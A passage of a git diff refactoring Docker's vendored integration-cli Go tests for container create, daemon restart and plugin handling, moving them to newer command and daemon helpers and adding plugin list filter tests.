-	createCmd = exec.Command(dockerBinary, "create", repoName)
-	s.trustedCmd(createCmd)
-	out, _, err = runCommandWithOutput(createCmd)
-	if err == nil {
-		c.Fatalf("Continuing with cached data even though it's an invalid root rotation: %s\n%s", err, out)
-	}
-	if !strings.Contains(out, "could not rotate trust to a new trusted root") {
-		c.Fatalf("Missing expected output on trusted create:\n%s", out)
-	}
-
-}
-
 func (s *DockerSuite) TestCreateStopSignal(c *check.C) {
 	name := "test_create_stop_signal"
 	dockerCmd(c, "create", "--name", name, "--stop-signal", "9", "busybox")
@@ -446,7 +307,7 @@ func (s *DockerSuite) TestCreateWithWorkdir(c *check.C) {
 
 	dockerCmd(c, "create", "--name", name, "-w", dir, "busybox")
 	// Windows does not create the workdir until the container is started
-	if daemonPlatform == "windows" {
+	if testEnv.OSType == "windows" {
 		dockerCmd(c, "start", name)
 	}
 	dockerCmd(c, "cp", fmt.Sprintf("%s:%s", name, dir), prefix+slash+"tmp")
@@ -479,21 +340,21 @@ RUN chmod 755 /entrypoint.sh
 ENTRYPOINT ["/entrypoint.sh"]
 CMD echo foobar`
 
-	ctx, err := fakeContext(dockerfile, map[string]string{
-		"entrypoint.sh": `#!/bin/sh
+	ctx := fakecontext.New(c, "",
+		fakecontext.WithDockerfile(dockerfile),
+		fakecontext.WithFiles(map[string]string{
+			"entrypoint.sh": `#!/bin/sh
 echo "I am an entrypoint"
 exec "$@"`,
-	})
-	c.Assert(err, check.IsNil)
+		}))
 	defer ctx.Close()
 
-	_, err = buildImageFromContext(name, ctx, true)
-	c.Assert(err, check.IsNil)
+	cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx))
 
-	out, _ := dockerCmd(c, "create", "--entrypoint=", name, "echo", "foo")
+	out := cli.DockerCmd(c, "create", "--entrypoint=", name, "echo", "foo").Combined()
 	id := strings.TrimSpace(out)
 	c.Assert(id, check.Not(check.Equals), "")
-	out, _ = dockerCmd(c, "start", "-a", id)
+	out = cli.DockerCmd(c, "start", "-a", id).Combined()
 	c.Assert(strings.TrimSpace(out), check.Equals, "foo")
 }
 
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go
index f91edc6555..69e190c30d 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_plugins_test.go
@@ -3,24 +3,20 @@
 package main
 
 import (
-	"os"
-	"os/exec"
-	"path/filepath"
 	"strings"
-	"syscall"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/docker/docker/pkg/mount"
 	"github.com/go-check/check"
+	"golang.org/x/sys/unix"
+	"gotest.tools/icmd"
 )
 
 // TestDaemonRestartWithPluginEnabled tests state restore for an enabled plugin
 func (s *DockerDaemonSuite) TestDaemonRestartWithPluginEnabled(c *check.C) {
 	testRequires(c, IsAmd64, Network)
 
-	if err := s.d.Start(); err != nil {
-		c.Fatalf("Could not start daemon: %v", err)
-	}
+	s.d.Start(c)
 
 	if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil {
 		c.Fatalf("Could not install plugin: %v %s", err, out)
@@ -35,9 +31,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithPluginEnabled(c *check.C) {
 		}
 	}()
 
-	if err := s.d.Restart(); err != nil {
-		c.Fatalf("Could not restart daemon: %v", err)
-	}
+	s.d.Restart(c)
 
 	out, err := s.d.Cmd("plugin", "ls")
 	if err != nil {
@@ -51,9 +45,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithPluginEnabled(c *check.C) {
 func (s *DockerDaemonSuite) TestDaemonRestartWithPluginDisabled(c *check.C) {
 	testRequires(c, IsAmd64, Network)
 
-	if err := s.d.Start(); err != nil {
-		c.Fatalf("Could not start daemon: %v", err)
-	}
+	s.d.Start(c)
 
 	if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName, "--disable"); err != nil {
 		c.Fatalf("Could not install plugin: %v %s", err, out)
@@ -65,9 +57,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithPluginDisabled(c *check.C) {
 		}
 	}()
 
-	if err := s.d.Restart(); err != nil {
-		c.Fatalf("Could not restart daemon: %v", err)
-	}
+	s.d.Restart(c)
 
 	out, err := s.d.Cmd("plugin", "ls")
 	if err != nil {
@@ -82,16 +72,12 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithPluginDisabled(c *check.C) {
 func (s *DockerDaemonSuite) TestDaemonKillLiveRestoreWithPlugins(c *check.C) {
 	testRequires(c, IsAmd64, Network)
 
-	if err := s.d.Start("--live-restore"); err != nil {
-		c.Fatalf("Could not start daemon: %v", err)
-	}
+	s.d.Start(c, "--live-restore")
 	if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil {
 		c.Fatalf("Could not install plugin: %v %s", err, out)
 	}
 	defer func() {
-		if err := s.d.Restart("--live-restore"); err != nil {
-			c.Fatalf("Could not restart daemon: %v", err)
-		}
+		s.d.Restart(c, "--live-restore")
 		if out, err := s.d.Cmd("plugin", "disable", pName); err != nil {
 			c.Fatalf("Could not disable plugin: %v %s", err, out)
 		}
@@ -104,10 +90,7 @@ func (s *DockerDaemonSuite) TestDaemonKillLiveRestoreWithPlugins(c *check.C) {
 		c.Fatalf("Could not kill daemon: %v", err)
 	}
 
-	cmd := exec.Command("pgrep", "-f", pluginProcessName)
-	if out, ec, err := runCommandWithOutput(cmd); ec != 0 {
-		c.Fatalf("Expected exit code '0', got %d err: %v output: %s ", ec, err, out)
-	}
+	icmd.RunCommand("pgrep", "-f", pluginProcessName).Assert(c, icmd.Success)
 }
 
 // TestDaemonShutdownLiveRestoreWithPlugins SIGTERMs daemon started with --live-restore.
@@ -115,16 +98,12 @@ func (s *DockerDaemonSuite) TestDaemonKillLiveRestoreWithPlugins(c *check.C) {
 func (s *DockerDaemonSuite) TestDaemonShutdownLiveRestoreWithPlugins(c *check.C) {
 	testRequires(c, IsAmd64, Network)
 
-	if err := s.d.Start("--live-restore"); err != nil {
-		c.Fatalf("Could not start daemon: %v", err)
-	}
+	s.d.Start(c, "--live-restore")
 	if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil {
 		c.Fatalf("Could not install plugin: %v %s", err, out)
 	}
 	defer func() {
-		if err := s.d.Restart("--live-restore"); err != nil {
-			c.Fatalf("Could not restart daemon: %v", err)
-		}
+		s.d.Restart(c, "--live-restore")
 		if out, err := s.d.Cmd("plugin", "disable", pName); err != nil {
 			c.Fatalf("Could not disable plugin: %v %s", err, out)
 		}
@@ -133,31 +112,24 @@ func (s *DockerDaemonSuite) TestDaemonShutdownLiveRestoreWithPlugins(c *check.C)
 		}
 	}()
 
-	if err := s.d.cmd.Process.Signal(os.Interrupt); err != nil {
+	if err := s.d.Interrupt(); err != nil {
 		c.Fatalf("Could not kill daemon: %v", err)
 	}
 
-	cmd := exec.Command("pgrep", "-f", pluginProcessName)
-	if out, ec, err := runCommandWithOutput(cmd); ec != 0 {
-		c.Fatalf("Expected exit code '0', got %d err: %v output: %s ", ec, err, out)
-	}
+	icmd.RunCommand("pgrep", "-f", pluginProcessName).Assert(c, icmd.Success)
 }
 
 // TestDaemonShutdownWithPlugins shuts down running plugins.
 func (s *DockerDaemonSuite) TestDaemonShutdownWithPlugins(c *check.C) {
 	testRequires(c, IsAmd64, Network, SameHostDaemon)
 
-	if err := s.d.Start(); err != nil {
-		c.Fatalf("Could not start daemon: %v", err)
-	}
+	s.d.Start(c)
 	if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil {
 		c.Fatalf("Could not install plugin: %v %s", err, out)
 	}
 
 	defer func() {
-		if err := s.d.Restart(); err != nil {
-			c.Fatalf("Could not restart daemon: %v", err)
-		}
+		s.d.Restart(c)
 		if out, err := s.d.Cmd("plugin", "disable", pName); err != nil {
 			c.Fatalf("Could not disable plugin: %v %s", err, out)
 		}
@@ -166,25 +138,50 @@ func (s *DockerDaemonSuite) TestDaemonShutdownWithPlugins(c *check.C) {
 		}
 	}()
 
-	if err := s.d.cmd.Process.Signal(os.Interrupt); err != nil {
+	if err := s.d.Interrupt(); err != nil {
 		c.Fatalf("Could not kill daemon: %v", err)
 	}
 
 	for {
-		if err := syscall.Kill(s.d.cmd.Process.Pid, 0); err == syscall.ESRCH {
+		if err := unix.Kill(s.d.Pid(), 0); err == unix.ESRCH {
 			break
 		}
 	}
 
-	cmd := exec.Command("pgrep", "-f", pluginProcessName)
-	if out, ec, err := runCommandWithOutput(cmd); ec != 1 {
-		c.Fatalf("Expected exit code '1', got %d err: %v output: %s ", ec, err, out)
+	icmd.RunCommand("pgrep", "-f", pluginProcessName).Assert(c, icmd.Expected{
+		ExitCode: 1,
+		Error:    "exit status 1",
+	})
+
+	s.d.Start(c)
+	icmd.RunCommand("pgrep", "-f", pluginProcessName).Assert(c, icmd.Success)
+}
+
+// TestDaemonKillWithPlugins leaves plugins running.
+func (s *DockerDaemonSuite) TestDaemonKillWithPlugins(c *check.C) {
+	testRequires(c, IsAmd64, Network, SameHostDaemon)
+
+	s.d.Start(c)
+	if out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName); err != nil {
+		c.Fatalf("Could not install plugin: %v %s", err, out)
 	}
 
-	s.d.Start("--live-restore")
-	cmd = exec.Command("pgrep", "-f", pluginProcessName)
-	out, _, err := runCommandWithOutput(cmd)
-	c.Assert(err, checker.IsNil, check.Commentf(out))
+	defer func() {
+		s.d.Restart(c)
+		if out, err := s.d.Cmd("plugin", "disable", pName); err != nil {
+			c.Fatalf("Could not disable plugin: %v %s", err, out)
+		}
+		if out, err := s.d.Cmd("plugin", "remove", pName); err != nil {
+			c.Fatalf("Could not remove plugin: %v %s", err, out)
+		}
+	}()
+
+	if err := s.d.Kill(); err != nil {
+		c.Fatalf("Could not kill daemon: %v", err)
+	}
+
+	// assert that plugins are running.
+	icmd.RunCommand("pgrep", "-f", pluginProcessName).Assert(c, icmd.Success)
 }
 
 // TestVolumePlugin tests volume creation using a plugin.
@@ -195,19 +192,11 @@ func (s *DockerDaemonSuite) TestVolumePlugin(c *check.C) {
 	destDir := "/tmp/data/"
 	destFile := "foo"
 
-	if err := s.d.Start(); err != nil {
-		c.Fatalf("Could not start daemon: %v", err)
-	}
+	s.d.Start(c)
 	out, err := s.d.Cmd("plugin", "install", pName, "--grant-all-permissions")
 	if err != nil {
 		c.Fatalf("Could not install plugin: %v %s", err, out)
 	}
-	pluginID, err := s.d.Cmd("plugin", "inspect", "-f", "{{.Id}}", pName)
-	pluginID = strings.TrimSpace(pluginID)
-	if err != nil {
-		c.Fatalf("Could not retrieve plugin ID: %v %s", err, pluginID)
-	}
-	mountpointPrefix := filepath.Join(s.d.RootDir(), "plugins", pluginID, "rootfs")
 	defer func() {
 		if out, err := s.d.Cmd("plugin", "disable", pName); err != nil {
 			c.Fatalf("Could not disable plugin: %v %s", err, out)
@@ -216,11 +205,6 @@ func (s *DockerDaemonSuite) TestVolumePlugin(c *check.C) {
 		if out, err := s.d.Cmd("plugin", "remove", pName); err != nil {
 			c.Fatalf("Could not remove plugin: %v %s", err, out)
 		}
-
-		exists, err := existsMountpointWithPrefix(mountpointPrefix)
-		c.Assert(err, checker.IsNil)
-		c.Assert(exists, checker.Equals, false)
-
 	}()
 
 	out, err = s.d.Cmd("volume", "create", "-d", pName, volName)
@@ -240,45 +224,17 @@ func (s *DockerDaemonSuite) TestVolumePlugin(c *check.C) {
 	c.Assert(out, checker.Contains, volName)
 	c.Assert(out, checker.Contains, pName)
 
-	mountPoint, err := s.d.Cmd("volume", "inspect", volName, "--format", "{{.Mountpoint}}")
-	if err != nil {
-		c.Fatalf("Could not inspect volume: %v %s", err, mountPoint)
-	}
-	mountPoint = strings.TrimSpace(mountPoint)
-
 	out, err = s.d.Cmd("run", "--rm", "-v", volName+":"+destDir, "busybox", "touch", destDir+destFile)
 	c.Assert(err, checker.IsNil, check.Commentf(out))
-	path := filepath.Join(s.d.RootDir(), "plugins", pluginID, "rootfs", mountPoint, destFile)
-	_, err = os.Lstat(path)
-	c.Assert(err, checker.IsNil)
 
-	exists, err := existsMountpointWithPrefix(mountpointPrefix)
-	c.Assert(err, checker.IsNil)
-	c.Assert(exists, checker.Equals, true)
-}
-
-func (s *DockerDaemonSuite) TestGraphdriverPlugin(c *check.C) {
-	testRequires(c, Network, IsAmd64, DaemonIsLinux, overlay2Supported, ExperimentalDaemon)
-
-	s.d.Start()
-
-	// install the plugin
-	plugin := "cpuguy83/docker-overlay2-graphdriver-plugin"
-	out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", plugin)
-	c.Assert(err, checker.IsNil, check.Commentf(out))
-
-	// restart the daemon with the plugin set as the storage driver
-	s.d.Restart("-s", plugin, "--storage-opt", "overlay2.override_kernel_check=1")
-
-	// run a container
-	out, err = s.d.Cmd("run", "--rm", "busybox", "true") // this will pull busybox using the plugin
+	out, err = s.d.Cmd("run", "--rm", "-v", volName+":"+destDir, "busybox", "ls", destDir+destFile)
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 }
 
 func (s *DockerDaemonSuite) TestPluginVolumeRemoveOnRestart(c *check.C) {
 	testRequires(c, DaemonIsLinux, Network, IsAmd64)
 
-	s.d.Start("--live-restore=true")
+	s.d.Start(c, "--live-restore=true")
 
 	out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pName)
 	c.Assert(err, checker.IsNil, check.Commentf(out))
@@ -287,7 +243,7 @@ func (s *DockerDaemonSuite) TestPluginVolumeRemoveOnRestart(c *check.C) {
 	out, err = s.d.Cmd("volume", "create", "--driver", pName, "test")
 	c.Assert(err, checker.IsNil, check.Commentf(out))
 
-	s.d.Restart("--live-restore=true")
+	s.d.Restart(c, "--live-restore=true")
 
 	out, err = s.d.Cmd("plugin", "disable", pName)
 	c.Assert(err, checker.NotNil, check.Commentf(out))
@@ -304,7 +260,7 @@ func (s *DockerDaemonSuite) TestPluginVolumeRemoveOnRestart(c *check.C) {
 }
 
 func existsMountpointWithPrefix(mountpointPrefix string) (bool, error) {
-	mounts, err := mount.GetMounts()
+	mounts, err := mount.GetMounts(nil)
 	if err != nil {
 		return false, err
 	}
@@ -315,3 +271,58 @@ func existsMountpointWithPrefix(mountpointPrefix string) (bool, error) {
 	}
 	return false, nil
 }
+
+func (s *DockerDaemonSuite) TestPluginListFilterEnabled(c *check.C) {
+	testRequires(c, IsAmd64, Network)
+
+	s.d.Start(c)
+
+	out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pNameWithTag, "--disable")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	defer func() {
+		if out, err := s.d.Cmd("plugin", "remove", pNameWithTag); err != nil {
+			c.Fatalf("Could not remove plugin: %v %s", err, out)
+		}
+	}()
+
+	out, err = s.d.Cmd("plugin", "ls", "--filter", "enabled=true")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), pName)
+
+	out, err = s.d.Cmd("plugin", "ls", "--filter", "enabled=false")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, pName)
+	c.Assert(out, checker.Contains, "false")
+
+	out, err = s.d.Cmd("plugin", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, pName)
+}
+
+func (s *DockerDaemonSuite) TestPluginListFilterCapability(c *check.C) {
+	testRequires(c, IsAmd64, Network)
+
+	s.d.Start(c)
+
+	out, err := s.d.Cmd("plugin", "install", "--grant-all-permissions", pNameWithTag, "--disable")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+
+	defer func() {
+		if out, err := s.d.Cmd("plugin", "remove", pNameWithTag); err != nil {
+			c.Fatalf("Could not remove plugin: %v %s", err, out)
+		}
+	}()
+
+	out, err = s.d.Cmd("plugin", "ls", "--filter", "capability=volumedriver")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, pName)
+
+	out, err = s.d.Cmd("plugin", "ls", "--filter", "capability=authz")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Not(checker.Contains), pName)
+
+	out, err = s.d.Cmd("plugin", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, pName)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go
index 3a74fe215f..d2ff9606e5 100644
--- a/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_daemon_test.go
@@ -5,6 +5,9 @@ package main
 import (
 	"bufio"
 	"bytes"
+	"context"
+	"crypto/tls"
+	"crypto/x509"
 	"encoding/json"
 	"fmt"
 	"io"
@@ -18,18 +21,27 @@ import (
 	"strconv"
 	"strings"
 	"sync"
-	"syscall"
 	"time"
 
-	"github.com/docker/docker/pkg/integration/checker"
-	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/cloudflare/cfssl/helpers"
+	"github.com/docker/docker/api"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/client"
+	moby_daemon "github.com/docker/docker/daemon"
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/cli/build"
+	"github.com/docker/docker/integration-cli/daemon"
+	testdaemon "github.com/docker/docker/internal/test/daemon"
+	"github.com/docker/docker/opts"
 	"github.com/docker/docker/pkg/mount"
-	"github.com/docker/docker/pkg/stringid"
 	"github.com/docker/go-units"
 	"github.com/docker/libnetwork/iptables"
 	"github.com/docker/libtrust"
 	"github.com/go-check/check"
 	"github.com/kr/pty"
+	"golang.org/x/sys/unix"
+	"gotest.tools/icmd"
 )
 
 // TestLegacyDaemonCommand test starting docker daemon using "deprecated" docker daemon
@@ -37,31 +49,29 @@ import (
 func (s *DockerDaemonSuite) TestLegacyDaemonCommand(c *check.C) {
 	cmd := exec.Command(dockerBinary, "daemon", "--storage-driver=vfs", "--debug")
 	err := cmd.Start()
+	go cmd.Wait()
 	c.Assert(err, checker.IsNil, check.Commentf("could not start daemon using 'docker daemon'"))
 
 	c.Assert(cmd.Process.Kill(), checker.IsNil)
 }
 
 func (s *DockerDaemonSuite) TestDaemonRestartWithRunningContainersPorts(c *check.C) {
-	if err := s.d.StartWithBusybox(); err != nil {
-		c.Fatalf("Could not start daemon with busybox: %v", err)
-	}
+	s.d.StartWithBusybox(c)
 
-	if out, err := s.d.Cmd("run", "-d", "--name", "top1", "-p", "1234:80", "--restart", "always", "busybox:latest", "top"); err != nil {
-		c.Fatalf("Could not run top1: err=%v\n%s", err, out)
-	}
-	// --restart=no by default
-	if out, err := s.d.Cmd("run", "-d", "--name", "top2", "-p", "80", "busybox:latest", "top"); err != nil {
-		c.Fatalf("Could not run top2: err=%v\n%s", err, out)
-	}
+	cli.Docker(
+		cli.Args("run", "-d", "--name", "top1", "-p", "1234:80", "--restart", "always", "busybox:latest", "top"),
+		cli.Daemon(s.d),
+	).Assert(c, icmd.Success)
+
+	cli.Docker(
+		cli.Args("run", "-d", "--name", "top2", "-p", "80", "busybox:latest", "top"),
+		cli.Daemon(s.d),
+	).Assert(c, icmd.Success)
 
 	testRun := func(m map[string]bool, prefix string) {
 		var format string
 		for cont, shouldRun := range m {
-			out, err := s.d.Cmd("ps")
-			if err != nil {
-				c.Fatalf("Could not run ps: err=%v\n%q", err, out)
-			}
+			out := cli.Docker(cli.Args("ps"), cli.Daemon(s.d)).Assert(c, icmd.Success).Combined()
 			if shouldRun {
 				format = "%scontainer %q is not running"
 			} else {
@@ -75,27 +85,21 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithRunningContainersPorts(c *check
 
 	testRun(map[string]bool{"top1": true, "top2": true}, "")
 
-	if err := s.d.Restart(); err != nil {
-		c.Fatalf("Could not restart daemon: %v", err)
-	}
+	s.d.Restart(c)
 	testRun(map[string]bool{"top1": true, "top2": false}, "After daemon restart: ")
 }
 
 func (s *DockerDaemonSuite) TestDaemonRestartWithVolumesRefs(c *check.C) {
-	if err := s.d.StartWithBusybox(); err != nil {
-		c.Fatal(err)
-	}
+	s.d.StartWithBusybox(c)
 
 	if out, err := s.d.Cmd("run", "--name", "volrestarttest1", "-v", "/foo", "busybox"); err != nil {
 		c.Fatal(err, out)
 	}
 
-	if err := s.d.Restart(); err != nil {
-		c.Fatal(err)
-	}
+	s.d.Restart(c)
 
-	if _, err := s.d.Cmd("run", "-d", "--volumes-from", "volrestarttest1", "--name", "volrestarttest2", "busybox", "top"); err != nil {
-		c.Fatal(err)
+	if out, err := s.d.Cmd("run", "-d", "--volumes-from", "volrestarttest1", "--name", "volrestarttest2", "busybox", "top"); err != nil {
+		c.Fatal(err, out)
 	}
 
 	if out, err := s.d.Cmd("rm", "-fv", "volrestarttest2"); err != nil {
@@ -112,8 +116,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithVolumesRefs(c *check.C) {
 
 // #11008
 func (s *DockerDaemonSuite) TestDaemonRestartUnlessStopped(c *check.C) {
-	err := s.d.StartWithBusybox()
-	c.Assert(err, check.IsNil)
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("run", "-d", "--name", "top1", "--restart", "always", "busybox:latest", "top")
 	c.Assert(err, check.IsNil, check.Commentf("run top1: %v", out))
@@ -147,8 +150,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartUnlessStopped(c *check.C) {
 	// both stopped
 	testRun(map[string]bool{"top1": false, "top2": false}, "")
 
-	err = s.d.Restart()
-	c.Assert(err, check.IsNil)
+	s.d.Restart(c)
 
 	// restart=always running
 	testRun(map[string]bool{"top1": true, "top2": false}, "After daemon restart: ")
@@ -156,8 +158,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartUnlessStopped(c *check.C) {
 	out, err = s.d.Cmd("start", "top2")
 	c.Assert(err, check.IsNil, check.Commentf("start top2: %v", out))
 
-	err = s.d.Restart()
-	c.Assert(err, check.IsNil)
+	s.d.Restart(c)
 
 	// both running
 	testRun(map[string]bool{"top1": true, "top2": true}, "After second daemon restart: ")
@@ -165,14 +166,13 @@ func (s *DockerDaemonSuite) TestDaemonRestartUnlessStopped(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonRestartOnFailure(c *check.C) {
-	err := s.d.StartWithBusybox()
-	c.Assert(err, check.IsNil)
+	s.d.StartWithBusybox(c)
 
 	out, err := s.d.Cmd("run", "-d", "--name", "test1", "--restart", "on-failure:3", "busybox:latest", "false")
 	c.Assert(err, check.IsNil, check.Commentf("run top1: %v", out))
 
 	// wait test1 to stop
-	hostArgs := []string{"--host", s.d.sock()}
+	hostArgs := []string{"--host", s.d.Sock()}
 	err = waitInspectWithArgs("test1", "{{.State.Running}} {{.State.Restarting}}", "false false", 10*time.Second, hostArgs...)
 	c.Assert(err, checker.IsNil, check.Commentf("test1 should exit but not"))
 
@@ -181,8 +181,7 @@ func (s *DockerDaemonSuite) TestDaemonRestartOnFailure(c *check.C) {
 	c.Assert(err, checker.IsNil, check.Commentf("out: %v", out))
 	lastStartTime := out
 
-	err = s.d.Restart()
-	c.Assert(err, check.IsNil)
+	s.d.Restart(c)
 
 	// test1 shouldn't restart at all
 	err = waitInspectWithArgs("test1", "{{.State.Running}} {{.State.Restarting}}", "false false", 0, hostArgs...)
@@ -196,32 +195,35 @@ func (s *DockerDaemonSuite) TestDaemonRestartOnFailure(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) TestDaemonStartIptablesFalse(c *check.C) {
-	if err := s.d.Start("--iptables=false"); err != nil {
-		c.Fatalf("we should have been able to start the daemon with passing iptables=false: %v", err)
-	}
+	s.d.Start(c, "--iptables=false")
 }
 
 // Make sure we cannot shrink base device at daemon restart.
 func (s *DockerDaemonSuite) TestDaemonRestartWithInvalidBasesize(c *check.C) {
 	testRequires(c, Devicemapper)
-	c.Assert(s.d.Start(), check.IsNil)
+	s.d.Start(c)
 
-	oldBasesizeBytes := s.d.getBaseDeviceSize(c)
+	oldBasesizeBytes := getBaseDeviceSize(c, s.d)
 	var newBasesizeBytes int64 = 1073741824 //1GB in bytes
 
 	if newBasesizeBytes < oldBasesizeBytes {
-		err := s.d.Restart("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes))
-		c.Assert(err, check.IsNil, check.Commentf("daemon should not have started as new base device size is less than existing base device size: %v", err))
+		err := s.d.RestartWithError("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes))
+		c.Assert(err, check.NotNil, check.Commentf("daemon should not have started as new base device size is less than existing base device size: %v", err))
+		// 'err != nil' is expected behaviour, no new daemon started,
+		// so no need to stop daemon.
+		if err != nil {
+			return
+		}
 	}
-	c.Assert(s.d.Stop(), check.IsNil)
+	s.d.Stop(c)
 }
 
 // Make sure we can grow base device at daemon restart.
 func (s *DockerDaemonSuite) TestDaemonRestartWithIncreasedBasesize(c *check.C) {
 	testRequires(c, Devicemapper)
-	c.Assert(s.d.Start(), check.IsNil)
+	s.d.Start(c)
 
-	oldBasesizeBytes := s.d.getBaseDeviceSize(c)
+	oldBasesizeBytes := getBaseDeviceSize(c, s.d)
 
 	var newBasesizeBytes int64 = 53687091200 //50GB in bytes
 
@@ -229,14 +231,42 @@ func (s *DockerDaemonSuite) TestDaemonRestartWithIncreasedBasesize(c *check.C) {
 		c.Skip(fmt.Sprintf("New base device size (%v) must be greater than (%s)", units.HumanSize(float64(newBasesizeBytes)), units.HumanSize(float64(oldBasesizeBytes))))
 	}
 
-	err := s.d.Restart("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes))
+	err := s.d.RestartWithError("--storage-opt", fmt.Sprintf("dm.basesize=%d", newBasesizeBytes))
 	c.Assert(err, check.IsNil, check.Commentf("we should have been able to start the daemon with increased base device size: %v", err))
 
-	basesizeAfterRestart := s.d.getBaseDeviceSize(c)
+	basesizeAfterRestart := getBaseDeviceSize(c, s.d)
 	newBasesize, err := convertBasesize(newBasesizeBytes)
 	c.Assert(err, check.IsNil, check.Commentf("Error in converting base device size: %v", err))
 	c.Assert(newBasesize, check.Equals, basesizeAfterRestart, check.Commentf("Basesize passed is not equal to Basesize set"))
-	c.Assert(s.d.Stop(), check.IsNil)
+	s.d.Stop(c)
+}
+
+func getBaseDeviceSize(c *check.C, d *daemon.Daemon) int64 {
+	info := d.Info(c)
+	for _, statusLine := range info.DriverStatus {
+		key, value := statusLine[0], statusLine[1]
+		if key == "Base Device Size" {
+			return parseDeviceSize(c, value)
+		}
+	}
+	c.Fatal("failed to parse Base Device Size from info")
+	return int64(0)
+}
+
+func parseDeviceSize(c *check.C, raw string) int64 {
+	size, err := units.RAMInBytes(strings.TrimSpace(raw))
+	c.Assert(err, check.IsNil)
+	return size
+}
+
+func convertBasesize(basesizeBytes int64) (int64, error) {
+	basesize := units.HumanSize(float64(basesizeBytes))
+	basesize = strings.Trim(basesize, " ")[:len(basesize)-3]
+	basesizeFloat, err := strconv.ParseFloat(strings.Trim(basesize, " "), 64)
+	if err != nil {
+		return 0, err
+	}
+	return int64(basesizeFloat) * 1024 * 1024 * 1024, nil
 }
 
 // Issue #8444: If docker0 bridge is modified (intentionally or unintentionally) and
@@ -246,67 +276,38 @@ func (s *DockerDaemonSuite) TestDaemonStartBridgeWithoutIPAssociation(c *check.C
 	// rather than depending on brctl commands to verify docker0 is created and up
 	// let's start the daemon and stop it, and then make a modification to run the
 	// actual test
-	if err := s.d.Start(); err != nil {
-		c.Fatalf("Could not start daemon: %v", err)
-	}
-	if err := s.d.Stop(); err != nil {
-		c.Fatalf("Could not stop daemon: %v", err)
-	}
+	s.d.Start(c)
+	s.d.Stop(c)
 
 	// now we will remove the ip from docker0 and then try starting the daemon
-	ipCmd := exec.Command("ip", "addr", "flush", "dev", "docker0")
-	stdout, stderr, _, err := runCommandWithStdoutStderr(ipCmd)
-	if err != nil {
-		c.Fatalf("failed to remove docker0 IP association: %v, stdout: %q, stderr: %q", err, stdout, stderr)
-	}
+	icmd.RunCommand("ip", "addr", "flush", "dev", "docker0").Assert(c, icmd.Success)
 
-	if err := s.d.Start(); err != nil {
+	if err := s.d.StartWithError(); err != nil {
 		warning := "**WARNING: Docker bridge network in bad state--delete docker0 bridge interface to fix"
 		c.Fatalf("Could not start daemon when docker0 has no IP address: %v\n%s", err, warning)
 	}
 }
 
 func (s *DockerDaemonSuite) TestDaemonIptablesClean(c *check.C) {
-	if err := s.d.StartWithBusybox(); err != nil {
-		c.Fatalf("Could not start daemon with busybox: %v", err)
-	}
+	s.d.StartWithBusybox(c)
 
 	if out, err := s.d.Cmd("run", "-d", "--name", "top", "-p", "80", "busybox:latest", "top"); err != nil {
 		c.Fatalf("Could not run top: %s, %v", out, err)
 	}
 
-	// get output from iptables with container running
 	ipTablesSearchString := "tcp dpt:80"
-	ipTablesCmd := exec.Command("iptables", "-nvL")
-	out, _, err := runCommandWithOutput(ipTablesCmd)
-	if err != nil {
-		c.Fatalf("Could not run iptables -nvL: %s, %v", out, err)
-	}
 
-	if !strings.Contains(out, ipTablesSearchString) {
-		c.Fatalf("iptables output should have contained %q, but was %q", ipTablesSearchString, out)
-	}
+	// get output from iptables with container running
+	verifyIPTablesContains(c, ipTablesSearchString)
 
-	if err := s.d.Stop(); err != nil {
-		c.Fatalf("Could not stop daemon: %v", err)
-	}
+	s.d.Stop(c)
 
 	// get output from iptables after restart
-	ipTablesCmd = exec.Command("iptables", "-nvL")
-	out, _, err = runCommandWithOutput(ipTablesCmd)
-	if err != nil {
